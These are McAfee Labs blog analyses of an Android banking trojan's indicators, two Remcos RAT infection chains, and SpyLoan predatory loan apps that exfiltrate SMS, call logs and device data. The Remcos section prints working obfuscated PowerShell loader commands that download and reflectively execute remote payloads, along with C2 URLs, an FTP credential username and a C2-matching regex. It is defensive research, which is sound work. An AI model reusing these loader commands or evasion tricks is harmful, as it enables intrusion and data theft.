    745f32ef020ab34fdab70dfb27d8a975b03e030f951a9f57690200ce134922b8 ax_17.number Controller Application

    Domains:

    • https[://]luyagyrvyytczgjxwhuv.supabase.co

    Firebase:

    • https[://]call-forwarder-1-default-rtdb.firebaseio.com

    The post A New Android Banking Trojan Masquerades as Utility and Banking Apps in India appeared first on McAfee Blog.

    The Stealthy Stalker: Remcos RAT

    By: McAfee Labs

    Authored By Sakshi Jaiswal, Anuradha M

    In Q3 2024, McAfee Labs identified a sharp rise in the Remcos RAT threat. It has emerged as a significant threat in the world of cybersecurity, gaining traction with its ability to infiltrate systems and compromise sensitive data. This malware, often delivered through phishing emails and malicious attachments, allows cybercriminals to remotely control infected machines, making it a powerful tool for espionage, data theft, and system manipulation. As cyberattacks become more sophisticated, understanding the mechanisms behind RemcosRAT and adopting effective security measures are crucial to protecting your systems from this growing threat. This blog presents a technical analysis of two RemcosRAT variants

    The heat map below illustrates the prevalence of Remcos in the field in Q3,2024

     

    Figure 1: Remcos heat map

    Variant 1:

    In the first variant of Remcos, executing a VBS file triggers a highly obfuscated PowerShell script that downloads multiple files from a command-and-control (C2) server. These files are then executed, ultimately leading to their injection into RegAsm.exe, a legitimate Microsoft .NET executable.

    Infection Chain

    Figure 2: Infection Chain of variant 1

    Analysis:

    Executing the VBS file initially triggers a Long-Obfuscated PowerShell command.

    Figure 3: Obfuscated PowerShell command 

     

    It uses multi-layer obfuscation, and after de-obfuscation, below is the final readable content.

    Figure 4: De-Obfuscated code

     

    The de-obfuscated PowerShell script performs the following actions:

    1. Firstly, the script checks if the PowerShell version is 2.0. then the file will be downloaded from Googledrive “’https://drive.google.com/uc?export=download&id=‘“ in Temp location. and if PowerShell version is not 2.0 then it downloads string from ftp server.
    2. It creates a copy of itself in the startup location – \AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\

    Figure 5: Self-copy location 

     

    1. In this case, since the PowerShell version is not 2.0, it will download strings from the FTP server.
    2. Uses FTP to download DLL01.txt file, from “ftp://desckvbrat1@ftp.desckvbrat.com.br/Upcrypter/01/DLL01.txt” with the username:desckvbrat1 and password: *******************as mentioned in the PowerShell script. Using FileZilla with the provided username and password to download files.

    Figure 6: Download file from FTP server 

     

    1. It has 3 files DLL01.txt, Entry.txt and Rumpe.txt, which contains a URL that provides direct access to a snippet hosted on the PasteCode.io platform.

    DLL01.txt File

    Figure 7: DLL01.txt content 

     

    Figure 8: Snippet which is hosted on PasteCode.io of DLL01.txt


    The snippet above is encoded, after decoding it, we are left with the ClassLibrary3.dll file.

    Figure 9: ClassLibrary3.dll

    Rumpe.txt String

    Figure 10: Rumpe.txt content 

    Figure 11: Snippet which is hosted on PasteCode.io of Rumpe.txt

     

    The snippet above is encoded, Decoding it generates ClassLibrary1.dll file.

    Figure 12: ClassLibrary1.dll

    Entry.txt

    Figure 13: Entry.txt content

     

    Figure 14: Snippet which is hosted on PasteCode.io of Entry.txt

     

    1. Last line of long PowerShell script – [System.AppDomain]::CurrentDomain.Load( $acBcZ ).GetType(‘ClassLibrary3.Class1’).GetMethod( ‘prFVI’ ).Invoke( $null , [object[]] ( ‘txt.sz/moc.gnitekrame-uotenok//:sptth‘ , $hzwje , ‘true’ ) ); This line loads a .NET assembly into the current application domain and invokes it.
    2. txt.sz/moc.gnitekrame-uotenok//:sptth” The string is a reversed URL. When reversed, it becomes: https://koneotemarket.com/zst.txt. The raw data hosted in that location is base64 encoded and stored in reversed order. Once decoded and reversed, the content is invoked for execution.

    Figure 15: Base64 encoded Content
     
    1. After invocation, it creates a directory in AppData/Local/Microsoft, specifically within the LocalLow folder. It then creates another folder named “System Update” and places three files inside it.

    The LocalLow folder is a directory in Windows used to store application data that requires low user permissions. It is located within the AppData folder. The two paths below show how the malware is using a very similar path to this legitimate windows path.

    legitimate Path: C:\Users\<YourUsername>\AppData\LocalLow

    Mislead Path: C:\Users\<YourUsername>\AppData\Local\Microsoft\LocalLow

    In this case, a LocalLow folder has been created inside the Microsoft directory to mislead users into believing it is a legitimate path for LocalLow.

    A screenshot of the files dropped into the System Update folder within the misleading LocalLow directory highlights the tactic used to mimic legitimate Windows directories, intending to evade user suspicion.

    Figure 16: Screenshot of dropped files into System Update directory

     

    Content of x3.txt

    Figure 17: x3.txt content 

     

    Then x2.ps1 is executed. Content of x2.ps1

    Figure 18: x2.ps1 content 

     

    The command adds a new registry entry in the Run key of the Windows Registry under HKCU (HKEY_CURRENT_USER). This entry ensures that a PowerShell script (yrnwr.ps1) located in the System Update folder inside the misleading LocalLow directory is executed at every user login.

    Figure 19: HKCU Run Registry entry for persistence 

     

    After adding registry entry, it executes yrnwr.ps1 file. Content of yrnwr.ps1 which is obfuscated.

    Figure 20: Obfuscated PowerShell content

     

    After Decoding yrnwr.ps1

     

    Figure 21: De-obfuscated PowerShell content 

     

    Figure 22: Last line of script 

     

    It utilizes a process injection technique to inject the final Remcos payload into the memory of RegAsm.exe, a legitimate Microsoft .NET executable.

    Figure 23: Process Tree 

     

    Memory String of RegAsm.exe which shows the traces of Remcos

    Figure 24: Keylogger related Strings in memory dump

     

    Figure 25: Remcos related String in memory dump

     

    Figure 26: Remcos Mutex creation String in memory dump 

     

    Mutex Created

    Figure 27: Mutex creation

     

    A log file is stored in the %ProgramData% directory, where a folder named “1210” is created. Inside this folder, a file called logs.dat is generated to capture and store all system logging activities.

    Figure 28: Logs.dat file to capture all keystroke activity. 

     

    Figure 29: Strings in payload

     

    Finally, it deletes the original VBS sample from the system.

    Variant 2 – Remcos from Office Open XML Document:

    This variant of Remcos comes from Office Open XML Document. The docx file comes from a spam email as an attachment.

    Infection Chain:

    Figure 30: Infection Chain of variant 2

    Email Spam:

    Figure 31: Spam Email

     

    The email displayed in the above image contains an attachment in the form of a .docx file, which is an Office Open XML document.

    Analysis:

    From the static analysis of .docx file, it is found that the malicious content was present in the relationship file “setting.xml.rels”. Below is the content of settings.xml.rels file:

    Figure 32: rels file content

     

    From the above content,it is evident that it downloads a file from an external resource which points to a URL hxxps://dealc.me/NLizza.

    The downloaded file is an RTF document named “seethenewthingswhichgivenmebackwithentirethingstobegetbackonlinewithentirethingsbackwithentirethinsgwhichgivenmenewthingsback_______greatthingstobe.doc”which has an unusually long filename.

    The RTF file is crafted to include CVE-2017-11882 Equation Editor vulnerability which is a remote code execution vulnerability that allows an attacker to execute arbitrary code on a victim’s machine by embedding malicious objects in documents.

    Upon execution, the RTF file downloads a VBS script from the URL “hxxp://91.134.96.177/70/picturewithmegetbacktouse.tIF” to the %appdata% directory, saving it as “picturewithmegetbacktouse.vbs”.

    Below is the content of VBS file:

    Figure 33: VBS Obfuscated content 

     

    Figure 34: VBS Obfuscated content 

     

    The VBScript is highly obfuscated, employing multiple layers of string concatenation to construct a command. It then executes that command using WScript.Shell.3ad868c612a6

    Below is the de-obfuscated code:

    Figure 35: De-Obfuscated Content 

     

    Figure 36: De-Obfuscated Content

     

    The above code shows that the VBS file launches PowerShell using Base64 encoded strings as the command.

    Below is the 1st PowerShell command line:

    “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -command $Codigo = ‘LiAoIChbc3RyaW5HXSR2ZXJCT1NFUFJFZmVSRU5jRSlbMSwzXSsneCctam9JTicnKSgoKCd7MH11cmwgJysnPSB7Mn1odHRwczovLycrJ3JhJysndy4nKydnaScrJ3QnKydodScrJ2J1Jysnc2VyJysnY29uJysndGVuJysndCcrJy5jb20vTm8nKydEJysnZScrJ3QnKydlYycrJ3RPbi9Ob0RldCcrJ2VjdCcrJ09uL3JlZicrJ3MnKycvJysnaGVhZHMvbWFpbi9EZXRhaCcrJ05vJysndCcrJ2gnKyctVicrJy50eHR7MicrJ307JysnIHswfWJhJysnc2UnKyc2JysnNEMnKydvbnQnKydlJysnbicrJ3QgPSAnKycoTmV3JysnLU9iaicrJ2UnKydjJysndCBTeXMnKyd0ZW0uTmUnKyd0LicrJ1dlYicrJ0MnKydsaWVudCkuRCcrJ28nKyd3bmwnKydvYScrJ2RTdHInKydpbicrJ2coJysneycrJzB9dScrJ3JsKTsgeycrJzAnKyd9JysnYmluYXJ5QycrJ29udGUnKyduJysndCA9JysnICcrJ1tTJysneXN0JysnZW0uQ28nKydudmUnKydydCcrJ10nKyc6OkYnKydyb21CYXNlNjRTdHJpbicrJ2coezB9YmFzZScrJzYnKyc0QycrJ29udGUnKydudCcrJyknKyc7IHsnKycwfScrJ2FzcycrJ2UnKydtYmx5JysnID0nKycgWycrJ1JlZmxlY3QnKydpb24uQXNzZW1ibCcrJ3ldJysnOjpMJysnbycrJ2FkKHswfWJpbicrJ2FyeUMnKydvbicrJ3QnKydlbnQpOyBbZG5saScrJ2IuSU8uSG9tJysnZScrJ106OlZBSSh7JysnMX0nKyd0JysneCcrJ3QuJysnQ1ZGR0dSLzA3Lzc3JysnMS42OS4nKyc0MycrJzEuMScrJzkvLycrJzpwJysndHRoezEnKyd9LCB7JysnMScrJ30nKydkZXNhdGl2YWRvezEnKyd9LCB7MX1kZXMnKydhdGknKyd2YWQnKydvezF9LCB7MX1kZXMnKydhdCcrJ2knKyd2YWRvezF9LCcrJyB7MScrJ31SZScrJ2dBJysncycrJ217JysnMX0sJysnIHsnKycxfXsnKycxfSwnKyd7MX17MX0pJyktZiAgW2NIYVJdMzYsW2NIYVJdMzQsW2NIYVJdMzkpICk=’;$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

    Base64 decoded content:

    Figure 37: Base64 decoded content

     

    The above base64 decoded content is used as input to the 2nd PowerShell command.

    Below is the 2nd PowerShell command line:

    “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -windowstyle hidden -executionpolicy bypass -NoProfile -command “. ( ([strinG]$verBOSEPREfeRENcE)[1,3]+’x’-joIN”)(((‘{0}url ‘+’= {2}https://’+’ra’+’w.’+’gi’+’t’+’hu’+’bu’+’ser’+’con’+’ten’+’t’+’.com/No’+’D’+’e’+’t’+’ec’+’tOn/NoDet’+’ect’+’On/ref’+’s’+’/’+’heads/main/Detah’+’No’+’t’+’h’+’-V’+’.txt{2’+’};’+’ {0}ba’+’se’+’6’+’4C’+’ont’+’e’+’n’+’t = ‘+'(New’+’-Obj’+’e’+’c’+’t Sys’+’tem.Ne‘+’t.’+’Web’+’C’+’lient).D’+’o’+’wnl’+’oa’+’dStr’+’in’+’g(‘+'{‘+’0}u’+’rl); {‘+’0’+’}’+’binaryC’+’onte’+’n’+’t =’+’ ‘+'[S’+’yst’+’2024 – New ‘+’nve’+’rt’+’]’+’::F’+’romBase64Strin’+’g({0}base’+’6’+’4C’+’onte’+’nt’+’)’+’; {‘+’0}’+’ass’+’e’+’mbly’+’ =’+’ [‘+’Reflect’+’ion.Assembl’+’y]’+’::L’+’o’+’ad({0}bin’+’aryC’+’on’+’t’+’ent); [dnli’+’b.IO.Hom’+’e’+’]::VAI({‘+’1}’+’t’+’x’+’t.’+’CVFGGR/07/77’+’1.69.’+’43’+’1.1’+’9//’+’:p’+’tth{1’+’}, {‘+’1’+’}’+’desativado{1’+’}, {1}des’+’ati’+’vad’+’o{1}, {1}des’+’at’+’i’+’vado{1},’+’ {1’+’}Re’+’gA’+’s’+’m{‘+’1},’+’ {‘+’1}{‘+’1},’+'{1}{1})’)-f [cHaR]36,[cHaR]34,[cHaR]39) )”

    • The PowerShell script uses string obfuscation by combining parts of strings using join and concatenation. This hides the actual URL being fetched.
    • It constructs a URL that points to a raw GitHub file: hxxps://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

    Below is the content of “DetahNoth-V.txt”:

    Figure 38: Base64 encoded binary content 

     

    Below is the code snippet to decode the above Base64 string into binary format and load it into memory as a .NET assembly. This method avoids writing files to disk, which makes it harder for some security products to detect the operation.

    Figure 39: Code snippet to decode Base64 string 

     

    The decoded binary content leads to a DLL file named as “dnlib.dll”.

    Below is the last part of code in the 2nd PowerShell command line:

    Figure 40: Strings in PowerShell command

     

    Once the assembly “dnlib.dll” is loaded, it calls a method VAI from a type dnlib.IO.Home within the loaded assembly. This method is invoked with several arguments:

    • txt.CVFGGR/07/771.69.431.19//:ptth: This is a reversed URL (hxxp://91.134.96.177/70/RGGFVC.txt) that might point to another resource.
    • desativado (translated from Portuguese as “deactivated”): Passed multiple times as arguments. This is used as a parameter for deactivating certain functions.
    • RegAsm: This is the name of the .NET assembly registration tool, potentially indicating that the script is registering or working with assemblies on the machine.

    Below is the content of URL -hxxp://91.134.96.177/70/RGGFVC.txt:

    Figure 41: Base64-encoded binary payload

     

    The content shown above is a reversed, Base64-encoded binary payload, which, when decoded, results in the Remcos EXE payload.

    Indicators of Compromise (IOCs)

    Variant 1

    File Type SHA256
    Vbs d81847976ea210269bf3c98c5b32d40ed9daf78dbb1a9ce638ac472e501647d2

    Variant 2

    File Type SHA256
    Eml 085ac8fa89b6a5ac1ce385c28d8311c6d58dd8545c3b160d797e3ad868c612a6
    Docx 69ff7b755574add8b8bb3532b98b193382a5b7cbf2bf219b276cb0b51378c74f
    Rtf c86ada471253895e32a771e3954f40d1e98c5fbee4ce702fc1a81e795063170a
    Vbs c09e37db3fccb31fc2f94e93fa3fe8d5d9947dbe330b0578ae357e88e042e9e5
    dnlib.dll 12ec76ef2298ac0d535cdb8b61a024446807da02c90c0eebcde86b3f9a04445a
    Remcos EXE 997371c951144335618b3c5f4608afebf7688a58b6a95cdc71f237f2a7cc56a2


    URLs

    hxxps://dealc.me/NLizza
    hxxp://91.134.96.177/70/picturewithmegetbacktouse.tIF
    hxxps://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
    hxxp://91.134.96.177/70/RGGFVC.txt


    Detections:

    Variant 1

    FileType Detection
    VBS Trojan:Script/Remcos.JD

    Variant 2

    FileType Detection
    Docx Trojan:Office/CVE20170199.D
    RTF Trojan:Office/CVE201711882.A
    VBS Trojan: Script/Remcos.AM
    Powershell Trojan: Script/Remcos.PS1
    EXE Trojan:Win/Genericy.AGP

    Conclusion

    In conclusion, the rise of Remcos RAT highlights the evolving nature of cyber threats and the increasing sophistication of malware. As this remote access Trojan continues to target consumers through phishing emails and malicious attachments, the need for proactive cybersecurity measures has never been more critical. By understanding the tactics used by cybercriminals behind Remcos RAT and implementing robust defenses such as regular software updates, email filtering, and network monitoring, organizations can better protect their systems and sensitive data. Staying vigilant and informed about emerging threats like Remcos RAT is essential in safeguarding against future cyberattacks.

    References

    https://www.mcafee.com/blogs/other-blogs/mcafee-labs/from-email-to-rat-deciphering-a-vb-script-driven-campaign/

     

     

     

    The post The Stealthy Stalker: Remcos RAT appeared first on McAfee Blog.

    SpyLoan: A Global Threat Exploiting Social Engineering

    By: McAfee Labs

    Authored by: Fernando Ruiz

    The McAfee mobile research team recently identified a significant global increase of SpyLoan, also known as predatory loan apps, on Android. These PUP (potentially unwanted programs) applications use social engineering tactics to trick users into providing sensitive information and granting extra mobile app permissions,  which can lead to extortion, harassment, and financial loss. 

    During our investigation of this threat, we identified fifteen apps with a combined total of over eight million installationsThis group of loan apps share a common framework to encrypt and exfiltrate data from a victim’s device to a command and control (C2) server using a similar HTTP endpoint infrastructure. They operate localized in targeted territories, mainly in South America, Southern Asia, and Africa, with some of them being promoted through deceptive advertising on social media.  

    McAfee is a member of the App Defense Alliance focused on protecting users by preventing threats from reaching their devices and improving app quality across the ecosystem. We reported the apps discovered to Google who have notified the developers that their apps violate Google Play policies and fixes are needed to come into compliance. Some apps were suspended from Google Play while others were updated by the developers. 

    McAfee Mobile Security detects all of these apps as Android/PUP.SpyLoan due to our PUP policy since even after some apps have updated to reduce the permissions requirements and the harvesting of sensitive information they still pose a risk for the user’s privacy due to the potential unethical practices that can be conducted by the operators of these apps that are not licensed or registered with the authorities that regulate financial services in each jurisdiction where they operate. 

     

    Figure 1: Examples of SpyLoan apps recently distributed on Google Play

    Since 2020, SpyLoan has become a consistent presence   in the mobile threat landscape. However, our telemetry indicates a rapid surge in their activity recently. From the end of Q2 to the end of Q3 2024, the number of malicious SpyLoan apps and unique infected devices has increased by over 75%  

    Understanding the Threat

    What Are SpyLoan Apps?

    SpyLoan apps are intrusive financial applications that lure users with promises of quick and flexible loans, often featuring low rates and minimal requirements. While these apps may seem to offer genuine value, the reality is that these apps primarily exist to collect as much personal information as possible, which they then may exploit to harass and extort users into paying predatory interest rates. They employ questionable tactics, such as deceptive marketing that highlights time-limited offers and countdowns, creating a false sense of urgency to pressure users into making hasty decisions. Ultimately, rather than providing genuine financial assistance, these apps can lead users into a cycle of debt and privacy violations. 

    While the specific behavior may vary by country, these apps share common characteristics and code at app and infrastructure level: 

    • Distribution via Official App Stores: Despite violating policies, these apps often slip through app store vetting processes and are available on platforms like Google Play, making them appear trustworthy. 
    • Deceptive Marketing: They use names, logos, and user interfaces that mimic reputable financial institutions to gain credibility. Often these loan apps are promoted by ads on social media networks 

    Figure 2: Ad for a SpyLoan app

    “High amount of loan” Add on Facebook for app “Presta Facil: Revision Rapida” which translate to “Easy Loan: Fast Approval” detailing interest rates, amount, period, etc for a loan in Colombian pesos. 

    • Similar user flow: After first execution a privacy policy is displayed with the details of what information will be collected, then a countdown timer creates the sense of urgency to apply to the loan offer and the user’s phone number with the country code of the targeted territory is required to continue, asking for a one-time-password (OTP) that is received by SMS to authenticate the user and validate that user has a phone number from the targeted country. 

    SpyLoan apps are consistent with this onboarding process. Then navigation bar and app actions are very similar with different graphics but have the same features in their respective localized languages. 

    Figure 3:  Example of privacy terms on two different SpyLoan apps, one targeting Indonesia (left) named “KreditKu-Uang Online” and another targeting Mexico (right) named “Préstamo Seguro-Rápido, Seguro”.

    Both apps have in common a framework that shares the user interface, user’s flow and encryption libraries with techniques for communication with C2 infrastructure, while the operators have different locations, language and target countries.

    • Privacy agreements: These apps have similar but not equal privacy terms, in general they describe and justify the sensitive data to be collected as part of the user identification process and anti-fraud measures.
      • They require users to consent to collect excessive and exploitative data that a formal financial institution would not normally require, such as SMS message content, call logs and contact lists.
      • The contact information of the financial institution is from free service email domain like Gmail or Outlook, like a personal email address, not from a formal and legal financial institution.
      • The websites implementation of the privacy terms of these SpyLoans apps are built with the same web-framework, using JavaScript to dynamically load the content of the terms, this text is not available in the HTML files directly.
    • Excessive Permission Requests: Upon installation, they request permissions that are unnecessary for a loan app, such as access to contacts, SMS, storage, calendar, phone call records and even microphone or camera.

    Common permissions on SpyLoan applications can be:

      • permission.CAMERA
      • permission.READ_CALL_LOG
      • permission.READ_PHONE_STATE
      • permission.ACCESS_COARSE_LOCATION
      • permission.READ_SMS

    Depending on the implementation and distribution method they can include more sensitive permissions.

    • Enticing Offers: Promising quick loans with minimal requirements to attract users in urgent financial situations. A countdown might be displayed to increase the sense of urgency.

    Figure 4: Three different apps, from different developers offering the same initial countdown onboarding screen: Offering an “85% approval rate” in different languages with a countdown.

    Phone Validation via SMS OTP: To complete the registration a phone number with the country code of the target country is required to validate the user’s phone is on the territory, receiving an one time password (OTP) to proceed to the registration via text message.

    Data Collection: Users are prompted to provide sensitive legal identification documents and personal information, banking accounts, employee information among with device data that is exfiltrated from the victim’s device.

    Impact on Users

    Financial Exploitation

    • Hidden Fees and High Interest Rates: Users receive less than the promised loan amount but are required to repay the full amount plus exorbitant fees within a short period.
    • Unauthorized Charges: Some apps initiate unauthorized transactions or charge hidden fees.

    Privacy Violations

    • Data Misuse: Personal information is exploited for blackmail or sold to third parties. This might include sextortion with victims’ pictures that can be exfiltrated or created with AI.
    • Harassment and Extortion: Users and their contacts receive threatening messages or calls including death threats.

    Emotional and Psychological Distress

    • Stress and Anxiety: Aggressive tactics cause significant emotional harm.
    • Reputational Damage: Public shaming can affect personal and professional relationships.

    Back to 2023 in Chile media reported the suicide of a victim of fake loans after the harassment and threats to her friends and family and to her integrity.

    Data Exfiltration analysis

    The group of SpyLoan applications reported in this blog belongs to the family identified by McAfee as Android/SpyLoan.DE that transmits the collected information encrypted to the command and control (C2) using AES (Advanced encryption standard) with 128bits keys then base64 encoding and optionally adds a hardcoded padding over https.

    Encryption key and initialization vector (IV) are hardcoded into the obfuscated application code.

    Figure 5: Encryption key and IV hardcoded in SpyLoan variant

    SpyLoan uses this same encryption routine to hide sensitive strings on resources.xml that leads to data exfiltration, for example:

    • String skadnjskdf in resources.xml:
      • <string name=”skadnjskdf”>501tm8gR24S8F8BpRDkvnw==</string>
    • The AES decrypted value using the same encryption routine implemented for data exfiltration:
      • <string name=”skadnjskdf”>content://sms/</string>

    This string is used to construct a content URI that allows access to SMS Messages that it’s implemented to extract fields like, date, address (sender/recipient), message body, status, etc., and formats into JSON that then will be encrypted again to be sent to the C2.

    Figure 6: Code section that exfiltrates all SMS messages from Victim’s device

    Exfiltrated data is posted into the C2 via HTTP post inside an encrypted JSON object. The URLs of the endpoints used to collect sensitive data shares the URL structure between different SpyLoan applications. They use the same URLs scheme that can be detected by this regex:

    ^https:\/\/[a-z0-9.-]+\/[a-z]{2,}-gp\/[a-z0-9]+\/[a-z0-9]+$

    Some examples of C2 URLs that match this scheme:

    • hxxps://su.mykreditandfear.com/her-gp/kgycinc/wjt
    • hxxps://hx.nihxdzzs.com/dz-gp/cfmwzu/uyeo
    • hxxps://prep.preprestamoshol.com/seg-gp/pdorj/tisqwfnkr
    • hxxps://tlon.pegetloanability.com/anerf-gp/jwnmk/dgehtkzh

    Using the same technique and obfuscation methods SpyLoan samples hide in his code the ability to exfiltrate larges amount of sensitive data from their victims, including:

    • Call Logs: Collects call log data from the device if permissions are granted
      • Number: The phone number of the caller
      • Type: Type of call (incoming, outgoing, missed)
      • Duration: The duration of the call
      • Date: The timestamp of the call
      • Name: The name of the contact (if available)
    • Files in download directory with metadata: file name, extension, file size, last modified timestamp
    • All accounts on the device, emails and social media accounts.
    • Information about all apps installed

    Other miscellaneous information collected:

    • Device and Network information:
      • Subscriber ID
      • DNS Information
      • Device ID (IMEI)
      • MAC address
      • Country code
      • Network Operator Name
      • Language
      • Network Type (WIfi, 4G, 3G, etc)
      • Phone number
      • Locale information (country code, display language)
      • Time Zone
      • Development Settings (enable or disable)
      • Phone Type (GSM, CDMA)
      • Elapsed Real-Time (The elapsed time since device was booted)
      • Proxy Configuration
    • SIM Information
      • SIM country ISO Code
      • SIM Serial Number (ICCID)
    • Location:
      • Permission: It checks for ACCESS_COARSER_LOCATION
      • Location provider: Check if GPS or network location are available
      • Last known location: Latitude or longitude
      • Geocoding information (converts latitude and longitude into a structured address):
        • Country name
        • Admirative area
        • City
        • Street
        • Address Line
      • Device configuration
        • Number of images: It counts the number of images files in external storage
        • Test Mode: reports if the device is in test mode
        • Keyboard Configuration
        • Current time
        • Enabled accessibility services flag
      • OS Settings:
        • Android version details (version, sdk level, fingerprint, id, display build)
        • Hardware information (device name, product name, device model, hardware details, device brand, board info, device serial number)
        • System configuration (bootloader version, build host, build user, CPU info)
        • Network (radio version, system type, build tags)
      • Storage Information:
        • External storage path, size,
        • Internal storage: total size, available size.
        • Memory information: total RAM, available RAM
      • Sensor data

    Data from sensors such as accelerometers, gyroscopes, magnetometers if available on the affected device. This information includes:

    • Sensor type, sensor name, version, vendor, maximum range, minimum delay, power consumption, resolution.

    Sensor data can be used for device fingerprinting and user’s behavioral monitoring.

    • Battery Information:
      • Battery level
      • Battery status: Indicates if the devices is plugged
      • Other battery metadata: health, if present, voltage, battery technology, type, etc.
    • Audio settings (maximum and current volume levels)

    Victim Experiences

    Users have reported alarming experiences, such as:

    • Receiving threatening calls and death threats for delayed payments.
    • Having personal photos and IDs misused to intimidate them.
    • The app accesses their contacts to send harassing messages to friends and family.

    Typical comments on fake loan apps:

    For example, “Préstamo Seguro-Rápido, Seguro” had many fake positive reviews on Google Play while a few consistent users reviews that alleged abuse of the collected data, extorsion and harassment.

     

    Figure 7: User reviews in Spanish

     

    October 18, 2024

    I do not recommend this app. They start calling and threatening you with edited photos and posting them on social media, even sending them to your contacts, a day before. Even when it’s not the due date. Not recommended at all! Pure fraud and extortion.
    September 25, 2024

    Horrible app, they don’t show you how much interest they will charge, which is a lot, and before the payment date arrives, they start threatening your contacts and even send you personal messages with threats and foul language, threatening to extort your family.

    Meanwhile other apps receive similar negative comments:

    Figure 8: Comments on SpyLoan apps

    Global Impact of SpyLoans Apps

    Worldwide Issue with Local Variations

    Figure 9: Global prevalence of SpyLoan apps

    These threats are not confined to a single region; they’ve been reported globally with localized adaptations. Predatory loan apps activities have been identified worldwide not limited to the variants technically described in this post, the following incidents can provide a wider context of the impact of this threat:

    • Asia:
      • India: Users faced harassment and data leaks from apps misusing granted permissions. Authorities have taken action against such apps
      • Southeast Asia: Countries like Thailand, Indonesia, Vietnam and Philippines have reported significant issues with these apps exploiting users’ financial vulnerabilities.
      • Africa:
        • Nigeria, Kenya, Uganda: Similar apps have led to financial fraud and unauthorized transactions, targeting a large unbanked population.
      • Latin America:

    Ranking of top 10 countries with highest prevalence of Fake Loans apps according to McAfee telemetry Q3 2024:

    • India
    • Mexico
    • Philippines
    • Indonesia
    • Thailand
    • Kenya
    • Colombia
    • Vietnam
    • Chile
    • Nigeria

    Law Enforcement Actions

    According to a report by the Judiciary of Peru, authorities conducted a major raid on a call center engaged in extortion and the operation of fake loan apps targeting individuals in Peru, Mexico, and Chile. 

    The police reported that over 300 individuals were linked to this criminal operation, which had defrauded at least 7,000 victims across multiple countries. 

    The call center employees were trained specifically to extort victims. Using information collected from the SpyLoan apps, they threatened users to extract as much money as possible by imposing inflated interest rates and additional fees. 

    Meanwhile in Chile, the commission for commission for the financial market (CMF) highlights in their website tens of fraudulent credit applications that has been distributed on Google Play, also the national consumer service (SERNAC) reports more cases. 

    In May 2024, the Chilean police has detained over 25 people linked to one Fake Loans operations that scammed over 2,000 victims according to La Tercera. 

    Despite the efforts the activity of these malware applications continues and increases in South America and the rest of the world. 

    Conclusion

    The threat of Android apps like SpyLoan is a global issue that exploits users’ trust and financial desperation. These apps leverage social engineering to bypass technical security measures and inflict significant harm on individuals. Despite law enforcement actions to capture multiple groups linked to the operation of SpyLoan apps, new operators and cybercriminals continue to exploit these fraud activities, especially in South America, Southeast Asia and Africa.

    SpyLoan apps operate with similar code at app and C2 level across different continents this suggest the presence of a common developer or a shared framework that is being sold to cybercriminals. This modular approach allows these developers to quickly distribute malicious apps tailored to various markets, exploiting local vulnerabilities while maintaining a consistent model for scamming users.

    By reusing code and tactics, they can efficiently target different countries, often evading detection by authorities and creating a widespread problem that is difficult to combat. This networked approach not only increases the scale of the threat but also complicates efforts to trace and shut down these operations, as they can easily adapt and relocate their operations to new regions.

    By understanding how these malicious apps operate and taking proactive steps to protect ourselves, we can mitigate the risks and help others do the same.

    How To Protect Yourself: Tips and Recommendations

    Be Cautious with Permissions

    • Review Permissions Carefully: Be wary of apps requesting permissions that seem unnecessary for their function.
    • Limit Permissions: Deny permissions that are not essential.

    Verify App Legitimacy

    • License and Registration: Ensure the institution is registered and licensed to operate in your country. Verify with your financial regulator’s authority or consumer protection agency.
    • Read User Reviews: Look for patterns of complaints about fraud or data misuse, pay special attention in apps with polarized reviews that might contain fake positive reviews.
    • Research the Developer: Look up the developer’s name, website, and reviews. Even if the app contains privacy policy which is mandatory on Google Play this might not be honored by scammers.

    Use Security Measures

    • Install Security Software: Use reputable antivirus and anti-malware apps.
    • Keep Your Device Updated: Regular updates can protect against vulnerabilities.

    Practice Safe Online Behavior

    • Don’t Share Sensitive Information: Provide personal data only to trusted and verified entities.
    • Be Skeptical of Unrealistic Offers: If it sounds too good to be true, it probably is.

    Report Suspicious Activity

    • Notify App Stores: Report fraudulent apps to help protect others.
    • Contact Authorities: If you’re a victim, report the incident to local law enforcement or cybercrime units.

    IOC

    Package App Name Downloads Country SHA256
    com.prestamoseguro.ss Préstamo Seguro-Rápido, seguro 1M Mexico f71dc766744573efb37f04851229eb47fc89aa7ae9124c77b94f1aa1ccc53b6c
    com.voscp.rapido Préstamo Rápido-Credit Easy 1M Colombia 22f4650621fea7a4deab4742626139d2e6840a9956285691b2942b69fef0ab22
    com.uang.belanja ได้บาทง่ายๆ-สินเชื่อด่วน 1M Senegal b5209ae7fe60abd6d86477d1f661bfba306d9b9cbd26cfef8c50b81bc8c27451
    com.rupiahkilat.best RupiahKilat-Dana cair 1M Senegal 9d51a5c0f9abea8e9777e9d8615bcab2f9794b60bf233e3087615638ceaa140e
    com.gotoloan.cash ยืมอย่างมีความสุข – เงินกู้ 1M Thailand 852a1ae6193899f495d047904f4bdb56cc48836db4d57056b02352ae0a63be12
    com.hm.happy.money เงินมีความสุข – สินเชื่อด่วน 1M Thailand 43977fce320b39a02dc4e323243ea1b3bc532627b5bc8e15906aaff5e94815ee
    com.kreditku.kuindo KreditKu-Uang Online 500K Indonesia dfbf0bf821fa586d4e58035ed8768d2b0f1226a3b544e5f9190746b6108de625
    com.winner.rupiahcl Dana Kilat-Pinjaman kecil 500K Indonesia b67e970d9df925439a6687d5cd6c80b9e5bdaa5204de14a831021e679f6fbdf1
    com.vay.cashloan.cash Cash Loan-Vay tiền 100K Vietnam e303fdfc7fd02572e387b8b992be2fed57194c7af5c977dfb53167a1b6e2f01b
    com.restrict.bright.cowboy RapidFinance 100K Tanzania e59fd9d96b3a446a2755e1dfc5a82ef07a3965866a7a1cb2cc1a2ffb288d110c
    com.credit.orange.enespeces.mtn.ouest.wave.argent.tresor.payer.pret PrêtPourVous 100K Senegal 453e23e68a9467f861d03cbace1f3d19909340dac8fabf4f70bc377f0155834e
    com.huaynamoney.prestamos.creditos.peru.loan.credit Huayna Money – Préstamo Rápido 100K Peru ef91f497e841861f1b52847370e2b77780f1ee78b9dab88c6d78359e13fb19dc
